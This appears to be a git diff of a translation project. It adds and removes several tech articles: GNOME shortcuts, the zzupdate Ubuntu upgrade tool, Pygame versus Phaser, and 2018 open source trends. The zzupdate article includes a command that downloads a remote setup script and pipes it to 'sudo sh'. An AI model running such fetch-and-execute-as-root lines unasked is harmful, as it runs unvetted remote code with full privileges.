|
||||
|
||||
If you expect GNOME to ship with hundreds or thousands of shell shortcuts, you will be disappointed to learn this isn't the case. The list of shortcuts isn't miles long, and not all of them will be useful to you, but there are still many keyboard shortcuts you can take advantage of.
|
||||
|
||||
![gnome-shortcuts-01-settings][1]
|
||||
|
||||
![gnome-shortcuts-01-settings][1]
|
||||
|
||||
To access the list of shortcuts, go to "Settings -> Devices -> Keyboard." Here are some less popular, yet useful shortcuts.
|
||||
|
||||
* Ctrl + Alt + T - this combination launches the terminal; you can use this from anywhere within GNOME
|
||||
|
||||
|
||||
|
||||
Two shortcuts I personally use quite frequently are:
|
||||
|
||||
* Alt + F4 - close the window on focus
|
||||
* Alt + F8 - resize the window
|
||||
|
||||
|
||||
Most of you know how to switch between open applications (Alt + Tab), but you may not know you can use Alt + Shift + Tab to cycle through applications in reverse direction.
|
||||
|
||||
Another useful combination for switching within the windows of an application is Alt + (key above Tab) (example: Alt + ` on a US keyboard).
|
||||
|
||||
If you want to show the Activities overview, use Alt + F1.
|
||||
|
||||
There are quite a lot of shortcuts related to workspaces. If you are like me and don't use multiple workspaces frequently, these shortcuts are useless to you. Still, some of the ones worth noting are the following:
|
||||
|
||||
* Super + PageUp (or PageDown) moves to the workspace above or below
|
||||
* Ctrl + Alt + Left (or Right) moves to the workspace on the left/right
|
||||
|
||||
If you add Shift to these commands, e.g. Shift + Ctrl + Alt + Left, you move the window one workspace above, below, to the left, or to the right.
|
||||
|
||||
Another favorite keyboard shortcut of mine is in the Accessibility section - Increase/Decrease Text Size. You can use Ctrl + + (and Ctrl + -) to zoom text size quickly. In some cases, this may be disabled by default, so do check it out before you try it.
|
||||
|
||||
The above-mentioned shortcuts are lesser known, yet useful keyboard shortcuts. If you are curious to see what else is available, you can check [the official GNOME shell cheat sheet][2].
|
||||
|
||||
If the default shortcuts are not to your liking, you can change them or create new ones. You do this from the same "Settings -> Devices -> Keyboard" dialog. Just select the entry you want to change, and the following dialog will popup.
|
||||
|
||||
![gnome-shortcuts-02-change-shortcut][3]
|
||||
|
||||
![gnome-shortcuts-02-change-shortcut][3]
|
||||
|
||||
Enter the keyboard combination you want.
|
||||
|
||||
![gnome-shortcuts-03-set-shortcut][4]
|
||||
|
||||
![gnome-shortcuts-03-set-shortcut][4]
|
||||
|
||||
If it is already in use you will get a message. If not, just click Set, and you are done.
|
||||
|
||||
If you want to add new shortcuts rather than change existing ones, scroll down until you see the "Plus" sign, click it, and in the dialog that appears, enter the name and keys of your new keyboard shortcut.
|
||||
|
||||
![gnome-shortcuts-04-add-custom-shortcut][5]
|
||||
|
||||
![gnome-shortcuts-04-add-custom-shortcut][5]
|
||||
|
||||
GNOME doesn't come with tons of shell shortcuts by default, and the above listed ones are some of the more useful ones. If these shortcuts are not enough for you, you can always create your own. Let us know if this is helpful to you.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/
|
||||
|
||||
作者:[Ada Ivanova][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com/author/adaivanoff/
|
||||
[1]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings)
|
||||
[2]:https://wiki.gnome.org/Projects/GnomeShell/CheatSheet
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut)
|
||||
[4]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut)
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut)
|
@ -0,0 +1,111 @@
|
||||
translating---geekpi
|
||||
|
||||
Easily Upgrade Ubuntu to a Newer Version with This Single Command
|
||||
======
|
||||
[zzupdate][1] is an open source command line utility that makes the task of upgrading Ubuntu Desktop and Server to newer versions a tad bit easier by combining several update commands into one single command.
|
||||
|
||||
Upgrading an Ubuntu system to a newer release is not a herculean task. Either with the GUI or with a couple of commands, you can easily upgrade your system to the latest release.
|
||||
|
||||
On the other hand, zzupdate written by Gianluigi 'Zane' Zanettini handles clean, update, autoremove, version upgrade and composer self-update for your Ubuntu system with just a single command.
|
||||
|
||||
It cleans up the local cache, updates available package information, and then performs a distribution upgrade. In the next step, it updates the Composer and removes the unused packages.
|
||||
|
||||
The script must run as root user.
|
||||
|
||||
### Installing zzupdate to upgrade Ubuntu to a newer version
|
||||
|
||||
![Upgrade Ubuntu to a newer version with a single command][2]
|
||||
|
||||
![Upgrade Ubuntu to a newer version with a single command][3]
|
||||
|
||||
To install zzupdate, execute the below command in a Terminal.
|
||||
```
|
||||
curl -s https://raw.githubusercontent.com/TurboLabIt/zzupdate/master/setup.sh | sudo sh
|
||||
```
|
||||
|
||||
And then copy the provided sample configuration file to zzupdate.conf and set your preferences.
|
||||
```
|
||||
sudo cp /usr/local/turbolab.it/zzupdate/zzupdate.default.conf /etc/turbolab.it/zzupdate.conf
|
||||
```
|
||||
|
||||
Once you have everything, just use the following command and it will start upgrading your Ubuntu system to a newer version (if there is any).
|
||||
|
||||
`sudo zzupdate`
|
||||
|
||||
Note that zzupdate upgrades the system to the next available version in case of a normal release. However, when you are running Ubuntu 16.04 LTS, it tries to search for the next long-term support version only and not the latest version available.
|
||||
|
||||
If you want to move out of the LTS release and upgrade to the latest release, you will have to change some options.
|
||||
|
||||
For Ubuntu desktop, open **Software & Updates**, and under the **Updates** tab, change "Notify me of a new Ubuntu version" to "**For any new version**".
|
||||
|
||||
![Software Updater in Ubuntu][2]
|
||||
|
||||
![Software Updater in Ubuntu][4]
|
||||
|
||||
For Ubuntu server, edit the release-upgrades file.
|
||||
```
|
||||
vi /etc/update-manager/release-upgrades
|
||||
|
||||
Prompt=normal
|
||||
```
|
||||
|
||||
### Configuring zzupdate [optional]
|
||||
|
||||
zzupdate options to configure
|
||||
```
|
||||
REBOOT=1
|
||||
```
|
||||
|
||||
If this value is 1, a system restart is performed after an upgrade.
|
||||
```
|
||||
REBOOT_TIMEOUT=15
|
||||
```
|
||||
|
||||
This sets the reboot timeout to 15 seconds; you can increase it, as some hardware takes much longer to reboot than others.
|
||||
```
|
||||
VERSION_UPGRADE=1
|
||||
```
|
||||
|
||||
Executes version progression if an upgrade is available.
|
||||
```
|
||||
VERSION_UPGRADE_SILENT=0
|
||||
```
|
||||
|
||||
Version progression occurs automatically.
|
||||
```
|
||||
COMPOSER_UPGRADE=1
|
||||
```
|
||||
|
||||
Value '1' will automatically upgrade the composer.
|
||||
```
|
||||
SWITCH_PROMPT_TO_NORMAL=0
|
||||
```
|
||||
|
||||
This feature switches the Ubuntu version upgrade prompt to normal. That is, if you have an LTS release running and this is set to 0, zzupdate won't upgrade it to Ubuntu 17.10; it will search for an LTS version only. In contrast, a value of 1 searches for the latest release whether you are running an LTS or a normal release.
|
||||
|
||||
Once done, all you have to do is run the following command in a console to perform a complete update of your Ubuntu system.
|
||||
```
|
||||
sudo zzupdate
|
||||
```
|
||||
|
||||
### Final Words
|
||||
|
||||
Though the upgrade process for Ubuntu is in itself an easy one, zzupdate reduces it to a mere one command. No coding knowledge is necessary, and the process is completely config-file driven. I personally found it a good tool to update several Ubuntu systems without the need to take care of different things separately.
|
||||
|
||||
Are you willing to give it a try?
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/zzupdate-upgrade-ubuntu/
|
||||
|
||||
作者:[Ambarish Kumar;Abhishek Prakash][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com
|
||||
[1]:https://github.com/TurboLabIt/zzupdate
|
||||
[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[3]:https://itsfoss.com/wp-content/uploads/2017/11/upgrade-ubuntu-single-command-featured-800x450.jpg
|
||||
[4]:https://itsfoss.com/wp-content/uploads/2017/11/software-update-any-new-version-800x378.jpeg
|
@ -1,143 +0,0 @@
|
||||
(translating by runningwater)
|
||||
Why Python and Pygame are a great pair for beginning programmers
|
||||
============================================================
|
||||
|
||||
### We look at three reasons Pygame is a good choice for learning to program.
|
||||
|
||||
|
||||
![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?")
|
||||
Image by :
|
||||
|
||||
opensource.com
|
||||
|
||||
Last month, [Scott Nesbitt][10] wrote about [Mozilla awarding $500K to support open source projects][11]. Phaser, an HTML/JavaScript game platform, was [awarded $50,000][12]. I’ve been teaching Phaser to my pre-teen daughter for a year, and it's one of the best and easiest HTML game development platforms to learn. [Pygame][13], however, may be a better choice for beginners. Here's why.
|
||||
|
||||
### 1\. One long block of code
|
||||
|
||||
Pygame is based on Python, the [most popular language for introductory computer courses][14]. Python is great for writing out ideas in one long block of code. Kids start off with a single file and with a single block of code. Before they can get to functions or classes, they start with code that will soon resemble spaghetti. It’s like finger-painting, as they throw thoughts onto the page.
|
||||
|
||||
More Python Resources
|
||||
|
||||
* [What is Python?][1]
|
||||
|
||||
* [Top Python IDEs][2]
|
||||
|
||||
* [Top Python GUI frameworks][3]
|
||||
|
||||
* [Latest Python content][4]
|
||||
|
||||
* [More developer resources][5]
|
||||
|
||||
This approach to learning works. Kids will naturally start to break things into functions and classes as their code gets more difficult to manage. By learning the syntax of a language like Python prior to learning about functions, the student will gain basic programming knowledge before using global and local scope.
|
||||
|
||||
Most HTML games separate the structure, style, and programming logic into HTML, CSS, and JavaScript to some degree and require knowledge of CSS and HTML. While the separation is better in the long term, it can be a barrier for beginners. Once kids realize that they can quickly build web pages with HTML and CSS, they may get distracted by the visual excitement of colors, fonts, and graphics. Even those who stay focused on JavaScript coding will still need to learn the basic document structure that the JavaScript code sits in.
|
||||
|
||||
### 2\. Global variables are more obvious
|
||||
|
||||
Both Python and JavaScript use dynamically typed variables, meaning that a variable becomes a string, an integer, or float when it’s assigned; however, making mistakes is easier in JavaScript. Similar to typed variables, both JavaScript and Python have global and local variable scopes. In Python, global variables inside of a function are identified with the global keyword.
|
||||
|
||||
Let’s look at the basic [Making your first Phaser game tutorial][15], by Alvin Ourrad and Richard Davey, to understand the challenge of using Phaser to teach programming to beginners. In JavaScript, global variables—variables that can be accessed anywhere in the program—are difficult to keep track of and often are the source of bugs that are challenging to solve. Richard and Alvin are expert programmers and use global variables intentionally to keep things concise.
|
||||
|
||||
```
|
||||
var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update });
|
||||
|
||||
function preload() {
|
||||
|
||||
game.load.image('sky', 'assets/sky.png');
|
||||
|
||||
}
|
||||
|
||||
var player;
|
||||
var platforms;
|
||||
|
||||
function create() {
|
||||
game.physics.startSystem(Phaser.Physics.ARCADE);
|
||||
…
|
||||
```
|
||||
|
||||
In their Phaser programming book [_Interphase_ ,][16] Richard Davey and Ilija Melentijevic explain that global variables are commonly used in many Phaser projects because they make it easier to get things done quickly.
|
||||
|
||||
> “If you’ve ever worked on a game of any significant size then this approach is probably already making you cringe slightly... So why do we do it? The reason is simply because it’s the most concise and least complicated way to demonstrate what Phaser can do.”
|
||||
|
||||
Although structuring a Phaser application to use local variables and split things up nicely into separation of concerns is possible, that’s tough for kids to understand when they’re first learning to program.
|
||||
|
||||
If you’re set on teaching your kids to code with JavaScript, or if they already know how to code in another language like Python, a good Phaser course is [The Complete Mobile Game Development Course][17], by [Pablo Farias Navarro][18]. Although the title focuses on mobile games, the actual course focuses on JavaScript and Phaser. The JavaScript and Phaser apps are moved to a mobile phone with [PhoneGap][19].
|
||||
|
||||
### 3\. Pygame comes with less assembly required
|
||||
|
||||
Thanks to [Python Wheels][20], Pygame is now super [easy to install][21]. You can also install it on Fedora/Red Hat with the **yum** package manager:
|
||||
|
||||
```
|
||||
sudo yum install python3-pygame
|
||||
```
|
||||
|
||||
See the official [Pygame installation documentation][22] for more information.
|
||||
|
||||
Although Phaser itself is even easier to install, it does require more knowledge to use. As mentioned previously, the student will need to assemble their JavaScript code within an HTML document with some CSS. In addition to the three languages—HTML, CSS, and JavaScript—Phaser also requires the use of Firefox or Chrome development tools and an editor. The most common editors for JavaScript are Sublime, Atom, VS Code (probably in that order).
|
||||
|
||||
Phaser applications will not run if you open the HTML file in a browser directly, due to [same-origin policy][23]. You must run a web server and access the files by connecting to the web server. Fortunately, you don’t need to run Apache on your local computer; you can run something lightweight like [httpster][24] for most projects.
|
||||
|
||||
### Advantages of Phaser and JavaScript
|
||||
|
||||
With all the challenges of JavaScript and Phaser, why am I teaching them? Honestly, I held off for a long time. I worried about students learning variable hoisting and scope. I developed my own curriculum based on Pygame and Python, then I developed one based on Phaser. Eventually, I decided to use Pablo’s pre-made curriculum as a starting point.
|
||||
|
||||
There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript.
|
||||
|
||||
In the end, I chose to use Phaser and JavaScript because I realized that the problems could be solved with JavaScript and a bit of work. High-quality debugging tools and the work of some exceptionally smart people have made JavaScript a language that is both accessible and useful for teaching kids to code.
|
||||
|
||||
### Final word: Python vs. JavaScript
|
||||
|
||||
When people ask me what language to start their kids with, I immediately suggest Python and Pygame. There are tons of great curriculum options, many of which are free. I used ["Making Games with Python & Pygame"][25] by Al Sweigart with my son. I also used _[Think Python: How to Think Like a Computer Scientist][7]_ by Allen B. Downey. You can get Pygame on your Android phone with [RAPT Pygame][26] by [Tom Rothamel][27].
|
||||
|
||||
Despite my recommendation, I always suspect that kids soon move to JavaScript. And that’s okay—JavaScript is a mature language with great tools. They’ll have fun with JavaScript and learn a lot. But after years of helping my daughter’s older brother create cool games in Python, I’ll always have an emotional attachment to Python and Pygame.
|
||||
|
||||
### About the author
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28]
|
||||
|
||||
Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/11/pygame
|
||||
|
||||
作者:[Craig Oda ][a]
|
||||
译者:[runningwater](https://github.com/runningwater)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/codetricity
|
||||
[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ
|
||||
[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ
|
||||
[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ
|
||||
[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc
|
||||
[7]:http://greenteapress.com/thinkpython/html/index.html
|
||||
[8]:https://opensource.com/users/codetricity
|
||||
[9]:https://opensource.com/user/46031/feed
|
||||
[10]:https://opensource.com/users/scottnesbitt
|
||||
[11]:https://opensource.com/article/17/10/news-october-14
|
||||
[12]:https://www.patreon.com/photonstorm/posts
|
||||
[13]:https://www.pygame.org/news
|
||||
[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext
|
||||
[15]:http://phaser.io/tutorials/making-your-first-phaser-game
|
||||
[16]:https://phaser.io/interphase
|
||||
[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/
|
||||
[18]:https://gamedevacademy.org/author/fariazz/
|
||||
[19]:https://phonegap.com/
|
||||
[20]:https://pythonwheels.com/
|
||||
[21]:https://pypi.python.org/pypi/Pygame
|
||||
[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation
|
||||
[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
|
||||
[24]:https://simbco.github.io/httpster/
|
||||
[25]:https://inventwithpython.com/makinggames.pdf
|
||||
[26]:https://github.com/renpytom/rapt-pygame-example
|
||||
[27]:https://github.com/renpytom
|
||||
[28]:https://opensource.com/users/codetricity
|
||||
[29]:https://opensource.com/users/codetricity
|
||||
[30]:https://opensource.com/users/codetricity
|
||||
[31]:https://opensource.com/article/17/11/pygame#comments
|
||||
[32]:https://opensource.com/tags/python
|
||||
[33]:https://opensource.com/tags/programming
|
@ -1,143 +0,0 @@
|
||||
translating by wangy325...
|
||||
|
||||
|
||||
10 open source technology trends for 2018
|
||||
============================================================
|
||||
|
||||
### What do you think will be the next open source tech trends? Here are 10 predictions.
|
||||
|
||||
![10 open source technology trends for 2018](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018")
|
||||
Image by : [Mitch Bennett][10]. Modified by Opensource.com. [CC BY-SA 4.0][11]
|
||||
|
||||
Technology is always evolving. New developments, such as OpenStack, Progressive Web Apps, Rust, R, the cognitive cloud, artificial intelligence (AI), the Internet of Things, and more are putting our usual paradigms on the back burner. Here is a rundown of the top open source trends expected to soar in popularity in 2018.
|
||||
|
||||
### 1\. OpenStack gains increasing acceptance
|
||||
|
||||
[OpenStack][12] is essentially a cloud operating system that offers admins the ability to provision and control huge compute, storage, and networking resources through an intuitive and user-friendly dashboard.
|
||||
|
||||
Many enterprises are using the OpenStack platform to build and manage cloud computing systems. Its popularity rests on its flexible ecosystem, transparency, and speed. It supports mission-critical applications with ease and lower costs compared to alternatives. But, OpenStack's complex structure and its dependency on virtualization, servers, and extensive networking resources has inhibited its adoption by a wider range of enterprises. Using OpenStack also requires a well-oiled machinery of skilled staff and resources.
|
||||
|
||||
The OpenStack Foundation is working overtime to fill the voids. Several innovations, either released or on the anvil, would resolve many of its underlying challenges. As complexities decrease, OpenStack will surge in acceptance. The fact that OpenStack is already backed by many big software development and hosting companies, in addition to thousands of individual members, makes it the future of cloud computing.
|
||||
|
||||
### 2\. Progressive Web Apps become popular
|
||||
|
||||
[Progressive Web Apps][13] (PWA), an aggregation of technologies, design concepts, and web APIs, offer an app-like experience in the mobile browser.
|
||||
|
||||
Traditional websites suffer from many inherent shortcomings. Apps, although offering a more personal and focused engagement than websites, place a huge demand on resources, including needing to be downloaded upfront. PWA delivers the best of both worlds. It delivers an app-like experience to users while being accessible on browsers, indexable on search engines, and responsive to fit any form factor. Like an app, a PWA updates itself to always display the latest real-time information, and, like a website, it is delivered in an ultra-safe HTTPS model. It runs in a standard container and is accessible to anyone who types in the URL, without having to install anything.
|
||||
|
||||
PWAs perfectly suit the needs of today's mobile users, who value convenience and personal engagement over everything else. That this technology is set to soar in popularity is a no-brainer.
|
||||
|
||||
### 3\. Rust to rule the roost
|
||||
|
||||
Most programming languages come with safety vs. control tradeoffs. [Rust][14] is an exception. The language co-opts extensive compile-time checking to offer 100% control without compromising safety. The last [Pwn2Own][15] competition threw up many serious vulnerabilities in Firefox on account of its underlying C++ language. If Firefox had been written in Rust, many of those errors would have manifested as compile-time bugs and resolved before the product rollout stage.
|
||||
|
||||
Rust's unique approach of built-in unit testing has led developers to consider it a viable first-choice open source language. It offers an effective alternative to languages such as C and Python to write secure code without sacrificing expressiveness. Rust has bright days ahead in 2018.
|
||||
|
||||
### 4\. R user community grows
|
||||
|
||||
The [R][16] programming language, a GNU project, is associated with statistical computing and graphics. It offers a wide array of statistical and graphical techniques and is extensible to boot. It starts where [S][17] ends. With the S language already the vehicle of choice for research in statistical methodology, R offers a viable open source route for data manipulation, calculation, and graphical display. An added benefit is R's attention to detail and care for the finer nuances.
|
||||
|
||||
Like Rust, R's fortunes are on the rise.
|
||||
|
||||
### 5\. XaaS expands in scope
|
||||
|
||||
XaaS, an acronym for "anything as a service," stands for the increasing number of services delivered over the internet, rather than on premises. Although software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) are well-entrenched, new cloud-based models, such as network as a service (NaaS), storage as a service (SaaS or StaaS), monitoring as a service (MaaS), and communications as a service (CaaS), are soaring in popularity. A world where anything and everything is available "as a service" is not far away.
|
||||
|
||||
The scope of XaaS now extends to bricks-and-mortar businesses, as well. Good examples are companies such as Uber and Lyft leveraging digital technology to offer transportation as a service and Airbnb offering accommodations as a service.
|
||||
|
||||
High-speed networks and server virtualization that make powerful computing affordable have accelerated the popularity of XaaS, to the point that 2018 may become the "year of XaaS." The unmatched flexibility, agility, and scalability will propel the popularity of XaaS even further.
|
||||
|
||||
### 6\. Containers gain even more acceptance
|
||||
|
||||
Container technology is the approach of packaging pieces of code in a standardized way so they can be "plugged and run" quickly in any environment. Container technology allows enterprises to cut costs and implementation times. While the potential of containers to revolutionize IT infrastructure has been evident for a while, actual container use has remained complex.
|
||||
|
||||
Container technology is still evolving, and the complexities associated with the technology decrease with every advancement. The latest developments make containers quite intuitive and as easy as using a smartphone, not to mention tuned for today's needs, where speed and agility can make or break a business.
|
||||
|
||||
### 7\. Machine learning and artificial intelligence expand in scope
|
||||
|
||||
[Machine learning and AI][18] give machines the ability to learn and improve from experience without a programmer explicitly coding the instruction.
|
||||
|
||||
These technologies are already well entrenched, with several open source technologies leveraging them for cutting-edge services and applications.
|
||||
|
||||
[Gartner predicts][19] the scope of machine learning and artificial intelligence will expand in 2018\. Several greenfield areas, such as data preparation, integration, algorithm selection, training methodology selection, and model creation are all set for big-time enhancements through the infusion of machine learning.
|
||||
|
||||
New open source intelligent solutions are set to change the way people interact with systems and transform the very nature of work.
|
||||
|
||||
* Conversational platforms, such as chatbots, make the question-and-command experience, where a user asks a question and the platform responds, the default medium of interacting with machines.
|
||||
|
||||
* Autonomous vehicles and drones, fancy fads today, are expected to become commonplace by 2018.
|
||||
|
||||
* The scope of immersive experience will expand beyond video games and apply to real-life scenarios such as design, training, and visualization processes.
|
||||
|
||||
### 8\. Blockchain becomes mainstream
|
||||
|
||||
Blockchain has come a long way from Bitcoin. The technology is already in widespread use in finance, secure voting, authenticating academic credentials, and more. In the coming year, healthcare, manufacturing, supply chain logistics, and government services are among the sectors most likely to embrace blockchain technology.
|
||||
|
||||
Blockchain distributes digital information. The information resides on millions of nodes, in shared and reconciled databases. The fact that it's not controlled by any single authority and has no single point of failure makes it very robust, transparent, and incorruptible. It also solves the threat of a middleman manipulating the data. Such inherent strengths account for blockchain's soaring popularity and explain why it is likely to emerge as a mainstream technology in the immediate future.
|
||||
|
||||
### 9\. Cognitive cloud moves to center stage
|
||||
|
||||
Cognitive technologies, such as machine learning and artificial intelligence, are increasingly used to reduce complexity and personalize experiences across multiple sectors. One case in point is gamification apps in the financial sector, which offer investors critical investment insights and reduce the complexities of investment models. Digital trust platforms reduce the identity-verification process for financial institutions by about 80%, improving compliance and reducing chances of fraud.
|
||||
|
||||
Such cognitive cloud technologies are now moving to the cloud, making it even more potent and powerful. IBM Watson is the most well-known example of the cognitive cloud in action. IBM's UIMA architecture was made open source and is maintained by the Apache Foundation. DARPA's DeepDive project mirrors Watson's machine learning abilities to enhance decision-making capabilities over time by learning from human interactions. OpenCog, another open source platform, allows developers and data scientists to develop artificial intelligence apps and programs.
|
||||
|
||||
Considering the high stakes of delivering powerful and customized experiences, these cognitive cloud platforms are set to take center stage over the coming year.
|
||||
|
||||
### 10\. The Internet of Things connects more things
|
||||
|
||||
At its core, the Internet of Things (IoT) is the interconnection of devices through embedded sensors or other computing devices that enable the devices (the "things") to send and receive data. IoT is already predicted to be the next big major disruptor of the tech space, but IoT itself is in a continuous state of flux.
|
||||
|
||||
One innovation likely to gain widespread acceptance within the IoT space is Autonomous Decentralized Peer-to-Peer Telemetry ([ADEPT][20]), which is propelled by IBM and Samsung. It uses a blockchain-type technology to deliver a decentralized network of IoT devices. Freedom from a central control system facilitates autonomous communications between "things" in order to manage software updates, resolve bugs, manage energy, and more.
|
||||
|
||||
### Open source drives innovation
|
||||
|
||||
Digital disruption is the norm in today's tech-centric era. Within the technology space, open source is now pervasive, and in 2018, it will be the driving force behind most of the technology innovations.
|
||||
|
||||
Which open source trends and technologies would you add to this list? Let us know in the comments.
|
||||
|
||||
### Topics
|
||||
|
||||
[Business][25][Yearbook][26][2017 Open Source Yearbook][27]
|
||||
|
||||
### About the author
|
||||
|
||||
[![Sreejith@Fingent](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/sreejith.jpg?itok=sdYNV49V)][21] Sreejith - I have been programming since 2000, and professionally since 2007\. I currently lead the Open Source team at [Fingent][6] as we work on different technology stacks, ranging from the "boring"(read tried and trusted) to the bleeding edge. I like building, tinkering with and breaking things, not necessarily in that order. Hit me up at: [https://www.linkedin.com/in/futuregeek/][7][More about me][8]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018
|
||||
|
||||
作者:[Sreejith ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/sreejith
|
||||
[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ
|
||||
[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ
|
||||
[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I
|
||||
[6]:https://www.fingent.com/
|
||||
[7]:https://www.linkedin.com/in/futuregeek/
|
||||
[8]:https://opensource.com/users/sreejith
|
||||
[9]:https://opensource.com/user/185026/feed
|
||||
[10]:https://www.flickr.com/photos/mitchell3417/9206373620
|
||||
[11]:https://creativecommons.org/licenses/by-sa/4.0/
|
||||
[12]:https://www.openstack.org/
|
||||
[13]:https://developers.google.com/web/progressive-web-apps/
|
||||
[14]:https://www.rust-lang.org/
|
||||
[15]:https://en.wikipedia.org/wiki/Pwn2Own
|
||||
[16]:https://en.wikipedia.org/wiki/R_(programming_language)
|
||||
[17]:https://en.wikipedia.org/wiki/S_(programming_language)
|
||||
[18]:https://opensource.com/tags/artificial-intelligence
|
||||
[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/
|
||||
[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/
|
||||
[21]:https://opensource.com/users/sreejith
|
||||
[22]:https://opensource.com/users/sreejith
|
||||
[23]:https://opensource.com/users/sreejith
|
||||
[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments
|
||||
[25]:https://opensource.com/tags/business
|
||||
[26]:https://opensource.com/tags/yearbook
|
||||
[27]:https://opensource.com/yearbook/2017
|
@ -1,78 +0,0 @@
|
||||
|
||||
Translating by FelixYFZ
|
||||
How to find a publisher for your tech book
|
||||
============================================================
|
||||
|
||||
### Writing a technical book takes more than a good idea. You need to know a bit about how the publishing industry works.
|
||||
|
||||
|
||||
![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book")
|
||||
Image by : opensource.com
|
||||
|
||||
You've got an idea for a technical book—congratulations! Like hiking the Appalachian Trail, or learning to cook a soufflé, writing a book is one of those things that people talk about, but never take beyond the idea stage. That makes sense, because the failure rate is pretty high. Making it real involves putting your idea in front of a publisher, and finding out whether it's good enough to become a book. That step is scary enough, but the lack of information about how to do it complicates matters.
|
||||
|
||||
If you want to work with a traditional publisher, you'll need to get your book in front of them and hopefully start on the path to publication. I'm the Managing Editor at the [Pragmatic Bookshelf][4], so I see proposals all the time, as well as helping authors to craft good ones. Some are good, others are bad, but I often see proposals that just aren't right for Pragmatic. I'll help you with the process of finding the right publisher, and how to get your idea noticed.
|
||||
|
||||
### Identify your target
|
||||
|
||||
Your first step is to figure out which publisher is a good fit for your idea. To start, think about the publishers that you buy books from, and that you enjoy. The odds are pretty good that your book will appeal to people like you, so starting with your favorites makes for a pretty good short list. If you don't have much of a book collection, you can visit a bookstore, or take a look on Amazon. Make a list of a handful of publishers that you personally like to start with.
|
||||
|
||||
